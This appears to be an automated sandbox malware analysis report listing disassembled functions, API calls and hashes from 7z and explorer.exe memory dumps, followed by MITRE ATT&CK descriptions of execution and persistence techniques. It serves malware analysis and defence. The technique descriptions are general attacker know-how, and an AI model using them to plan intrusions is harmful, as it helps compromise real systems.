Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputcfputs
String ID: Scan $Scanning the drive:
API String ID: 269475090-1085461122
Opcode ID: a2747e59b778fe73a74f06889e3ba295ca3352f4c342e3460064b847c51e33a6
Instruction ID: 6760a2d8ff0609dcdc2cc062be103bf306c7c8cb541439784248ff6a1473cacd
Opcode Fuzzy Hash: a2747e59b778fe73a74f06889e3ba295ca3352f4c342e3460064b847c51e33a6
Instruction Fuzzy Hash: 1BE02666301C8181DE01DF2ADF8439C1321AB84BE4F9490219E0D07321EF18C48AC300

Function 0099EC5C Relevance: 5.3, APIs: 4, Instructions: 261COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0099ECEE
free.MSVCRT ref: 0099ECF6
free.MSVCRT ref: 0099EFE3
free.MSVCRT ref: 0099EFEB

Part of subcall function 00974D78: free.MSVCRT ref: 00974DBC
Part of subcall function 00974D78: free.MSVCRT ref: 00974DC4
Part of subcall function 00974D78: free.MSVCRT ref: 00974EAC

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 2568c4c8a93fed0a7db5756fe4b5abc77c557bdbfdb6e41abb2639136c3796b8
Instruction ID: 174041593ad977960e06f586960e9858206bd4aeb2b4392e087c37e5cb03025e
Opcode Fuzzy Hash: 2568c4c8a93fed0a7db5756fe4b5abc77c557bdbfdb6e41abb2639136c3796b8
Instruction Fuzzy Hash: BBA1AA23314A8196DF20DF2AD5843AE7764F788B94F588126DB9E877A5EB39C894C700

Function 009759E0 Relevance: 5.1, APIs: 4, Instructions: 117COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00975ABB
free.MSVCRT ref: 00975ACE
free.MSVCRT ref: 00975AD6
memmove.MSVCRT ref: 00975AEE

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: 690fc6323045f1499638e60008430e199e5b92b8d4d6359a2f546a67527e5006
Instruction ID: 80be1a94efaaa5f9a20c6f3abb6cabc0990aa1cdba5fe11b81363c110fa37431
Opcode Fuzzy Hash: 690fc6323045f1499638e60008430e199e5b92b8d4d6359a2f546a67527e5006
Instruction Fuzzy Hash: B241D833604E8096CB60EF26E48116EB725F7C1FE4B55C211EB5E17B69DBB8C852CB00

Function 009A25DC Relevance: 5.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A279A
free.MSVCRT ref: 009A27A7
free.MSVCRT ref: 009A27B4
free.MSVCRT ref: 009A27C1
free.MSVCRT ref: 009A33CE
free.MSVCRT ref: 009A33DB
free.MSVCRT ref: 009A33E8
free.MSVCRT ref: 009A33F5
free.MSVCRT ref: 009A3430
free.MSVCRT ref: 009A343B
free.MSVCRT ref: 009A3444
free.MSVCRT ref: 009A344F
free.MSVCRT ref: 009A345D
free.MSVCRT ref: 009A3484
free.MSVCRT ref: 009A348D
free.MSVCRT ref: 009A349B
free.MSVCRT ref: 009A34A6

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 2d395fef6bf6d2161f205ad2dbd11117f8f32b2c6da05af5b4328dea44ce9941
Instruction ID: d33769b995ffd1609791932488f6ad177e35eda6f625cfa3414b78fd3e85e4d5
Opcode Fuzzy Hash: 2d395fef6bf6d2161f205ad2dbd11117f8f32b2c6da05af5b4328dea44ce9941
Instruction Fuzzy Hash: 2941AB6650D6D086CA75CB29A054BEEBBB9F3C7784F458007DAC953B1ACE38D984CB80

Function 00986B58 Relevance: 5.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00986B98
free.MSVCRT ref: 00986C80
free.MSVCRT ref: 00986C88
free.MSVCRT ref: 00986C9E

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 323c9969710448a883c5df48d84fecfab0fddd235bddb9be855929d7e43add65
Instruction ID: f3453cb2f5bed91ff6e31a42a91b177170c6e4dfb1fe8169a76a484079e4e41b
Opcode Fuzzy Hash: 323c9969710448a883c5df48d84fecfab0fddd235bddb9be855929d7e43add65
Instruction Fuzzy Hash: 2F31D27361568086CB21AF25E9417AA7764F3C8BE4F584236EFAA4B794DF38C842C710

Function 0099A034 Relevance: 5.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0099A070
free.MSVCRT ref: 0099A078
free.MSVCRT ref: 0099A0E2
memmove.MSVCRT ref: 0099A118

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: 35a1d6c259a3625b378e1dffe93dee20d714f09e6227e3efd6c4fd439d23f854
Instruction ID: e72f94af5db6b4aeaff732a6d632a3559cd1e11b79b38129cda643a0ec5686fd
Opcode Fuzzy Hash: 35a1d6c259a3625b378e1dffe93dee20d714f09e6227e3efd6c4fd439d23f854
Instruction Fuzzy Hash: 1B21F623205A8089DF25AF2BEC557696758FB86B94F6CC124EF5D0B381DF78C881C352

Function 00974B58 Relevance: 5.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00974BA5
free.MSVCRT ref: 00974BAD
memmove.MSVCRT ref: 00974BEA
free.MSVCRT ref: 00974BF2

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: 907a790e22709f66cba6a81009bdf1bb2919779642d070dbe716919cc3937b99
Instruction ID: e9475b13f1f39c7a43b70abfffca228b8e0ff10297beca40bd87777c1b7e4c9b
Opcode Fuzzy Hash: 907a790e22709f66cba6a81009bdf1bb2919779642d070dbe716919cc3937b99
Instruction Fuzzy Hash: DE21A137612A9486CB11DF2AD51036D7365E784FE4B59C225DEAD0B399EF38DC42C360

Function 00987780 Relevance: 5.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0098779B
LeaveCriticalSection.KERNEL32 ref: 009877A7
EnterCriticalSection.KERNEL32 ref: 0098783C
LeaveCriticalSection.KERNEL32 ref: 00987848

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 905f98d841eae4ab66d526709c79df53eb5328ecb6ed6fba7ada2edbd53a37aa
Instruction ID: ed2838d8887b9c890adf0b1873bc4a0c0eb1ac395c7773aba89f15a024ca6314
Opcode Fuzzy Hash: 905f98d841eae4ab66d526709c79df53eb5328ecb6ed6fba7ada2edbd53a37aa
Instruction Fuzzy Hash: 51212526704B40A7CB20AF2AE9942597370F748B98F285122DF4D47B25DF38D8A5C700

Function 0099E7A0 Relevance: 5.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 00972130: malloc.MSVCRT ref: 00972134
Part of subcall function 00972130: _CxxThrowException.MSVCRT ref: 0097214F

free.MSVCRT ref: 0099E81E
free.MSVCRT ref: 0099E828
free.MSVCRT ref: 0099E832
free.MSVCRT ref: 0099E83C

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$ExceptionThrowmalloc
String ID:
API String ID: 2043655614-0
Opcode ID: 599e7315893330928f463c9da471a6a003b51d38736cd83a9fad199d7e4e3aaa
Instruction ID: ef37b456943fcd3901600f39ce5bd38dd4ff62d230c4e5ee2571a72f5fa6d206
Opcode Fuzzy Hash: 599e7315893330928f463c9da471a6a003b51d38736cd83a9fad199d7e4e3aaa
Instruction Fuzzy Hash: 54119072225B8082CF20DF6AE84131D73A9F7C5BE0F608226AB9D077A8DF38C855C744

Function 009B75A4 Relevance: 5.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 009B75CF
memcmp.MSVCRT ref: 009B75EA
memcmp.MSVCRT ref: 009B7600

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 26e0d05632ee771259b6d8779e1bb14a2af1a10e0c5519a103b38d64912a3de7
Instruction ID: b039e2eec8861e285ab792826ef80788431c08ee15175a85194b3b6c26af4d77
Opcode Fuzzy Hash: 26e0d05632ee771259b6d8779e1bb14a2af1a10e0c5519a103b38d64912a3de7
Instruction Fuzzy Hash: B501D2B230DB4185FB049BAA9E517E46359DB89FE4F844420CE058B307EF38CA46C310

Function 0099C8E8 Relevance: 5.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0099C913
memcmp.MSVCRT ref: 0099C92E
memcmp.MSVCRT ref: 0099C944

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: ebbf41f14a031a46e4a55ff2dc776043666cb55a5837aa6e1a48b56d902b4385
Instruction ID: 3ba80eb828ac86fdc6e744f614325af3b37d3254092a6bbaa4affd0a0c9f0822
Opcode Fuzzy Hash: ebbf41f14a031a46e4a55ff2dc776043666cb55a5837aa6e1a48b56d902b4385
Instruction Fuzzy Hash: 7C0192E230974151FF049F2AAD513E822599B4AFD4F948421DE0597306EB78CD55C304

Function 00983A0C Relevance: 5.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00983A37
memcmp.MSVCRT ref: 00983A4D
memcmp.MSVCRT ref: 00983A69
memcmp.MSVCRT ref: 00983A85

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: fea3fd7b45b55f817435c8431d97fe1bf12a638175959c43ee92c8fc165712c7
Instruction ID: 30886b0a95a8a05f9a1aba72cb954bac5988b198f383bf402ba1c511f8541049
Opcode Fuzzy Hash: fea3fd7b45b55f817435c8431d97fe1bf12a638175959c43ee92c8fc165712c7
Instruction Fuzzy Hash: 77019EA270974191EB08AB6ADD513E83229DB89FD4F94D421CE4A8B347EB78CE46C304

Function 0099CE98 Relevance: 5.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0099CEC3
memcmp.MSVCRT ref: 0099CED9
memcmp.MSVCRT ref: 0099CEF5
memcmp.MSVCRT ref: 0099CF11

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 3300147bea888004f54cd18b7a1711a170f8e79cb67e40ec15571cdf7fcd0c60
Instruction ID: 40a24646914effecd9fa00bc58b26c8422bb86ce979e694cbfd8ca60904085f7
Opcode Fuzzy Hash: 3300147bea888004f54cd18b7a1711a170f8e79cb67e40ec15571cdf7fcd0c60
Instruction Fuzzy Hash: 500180E230974091EF04DF6A9D513E4622A9B59FD4F948421DE0A87306EF38CE46C314

Function 0097538C Relevance: 5.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009753E6
free.MSVCRT ref: 009753EE
free.MSVCRT ref: 009753FA
free.MSVCRT ref: 00975402

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: ea9aa8451205e714d2d2deee7ad544f8e48fe2026ff0a9e62e11d2d899170449
Instruction ID: 207d77d8f2ebbbecfebd0dc994d3445d1cf340b631c2c9fa7e18c51fbd564652
Opcode Fuzzy Hash: ea9aa8451205e714d2d2deee7ad544f8e48fe2026ff0a9e62e11d2d899170449
Instruction Fuzzy Hash: D901B563324D88C59521BE57DC9062A6618BB41BE571E8115EF2C0B390DFA0C843C310

Function 00991474 Relevance: 5.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009914A6
free.MSVCRT ref: 009914AF
free.MSVCRT ref: 009914B8
free.MSVCRT ref: 009914C0

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: efa2551094f8694e9312fa94f2ef5c0b0e1a7981b61eb5219889216caf8af953
Instruction ID: 09dc3dd8dbab43a27796d9e20383e7810eef8a7c58d6a24df294a353d3be94af
Opcode Fuzzy Hash: efa2551094f8694e9312fa94f2ef5c0b0e1a7981b61eb5219889216caf8af953
Instruction Fuzzy Hash: D0F0825372599489DE10EF2BDC912A82328BF9AFE8B5C8171EF1D0B754EE21CC52C310

Function 009B7968 Relevance: 5.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009B799B
free.MSVCRT ref: 009B79A4
free.MSVCRT ref: 009B79AC
free.MSVCRT ref: 009B79B9

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: d981d276683500439fe255ece07c6d20aa2690fecfcea96cff91bf552de1cfa0
Instruction ID: 5cc363d788c2c8d748b73a66e9a29f282dfa2dce52edf7063692ea5c8c487b1a
Opcode Fuzzy Hash: d981d276683500439fe255ece07c6d20aa2690fecfcea96cff91bf552de1cfa0
Instruction Fuzzy Hash: 88F089137595809ACA10AF67DD9126C6314BFD6BE475C4671EF1D0B745DF20C862C360

Function 00990BBC Relevance: 5.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00990BCC
free.MSVCRT ref: 00990BD5
free.MSVCRT ref: 00990C00
free.MSVCRT ref: 00990C08

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: fffe1feea4d5eb521afbbdfec112adb7fa227329f3f82f7615eed68f37e3b42c
Instruction ID: f28cd74a91d94ed7ef5974078ec21a991bb49c8f8d41e773a7aa452573dec7f5
Opcode Fuzzy Hash: fffe1feea4d5eb521afbbdfec112adb7fa227329f3f82f7615eed68f37e3b42c
Instruction Fuzzy Hash: C5F05E23B2688489CA11AF2BDC512686324ABD5FE9B5D8261AF2D0B355DE24C842C360

Analysis Process: explorer.exePID: 6432, Parent PID: 6896COMMON

Non-executed Functions

Function 00000001402D82A0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00000001402D82CC
GetCurrentThreadId.KERNEL32 ref: 00000001402D82DA
GetCurrentProcessId.KERNEL32 ref: 00000001402D82E6
QueryPerformanceCounter.KERNEL32 ref: 00000001402D82F6

Memory Dump Source

Source File: 00000028.00000002.3027272359.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000028.00000002.3027247509.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.3027829379.00000001402DD000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.3028044780.000000014040B000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.3028044780.000000014042C000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.3028044780.000000014042E000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.3028044780.00000001406B6000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.3028044780.0000000140738000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.3028291609.0000000140739000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.3028330772.000000014075E000.00000020.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.3028358837.0000000140764000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_140000000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 40e2a232fc295a5026443da29b24fa9c722a4f82c9d20809496c69369bb5da58
Instruction ID: 21d2bc6bb35d802d5d5cc750b7b1863eea689a07cd70b94b43f5df2df9f0d793
Opcode Fuzzy Hash: 40e2a232fc295a5026443da29b24fa9c722a4f82c9d20809496c69369bb5da58
Instruction Fuzzy Hash: FA112732750F058AEB01CF61E8583A833A4FB5DB68F441E25EF6D867A4DB78C5558340

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

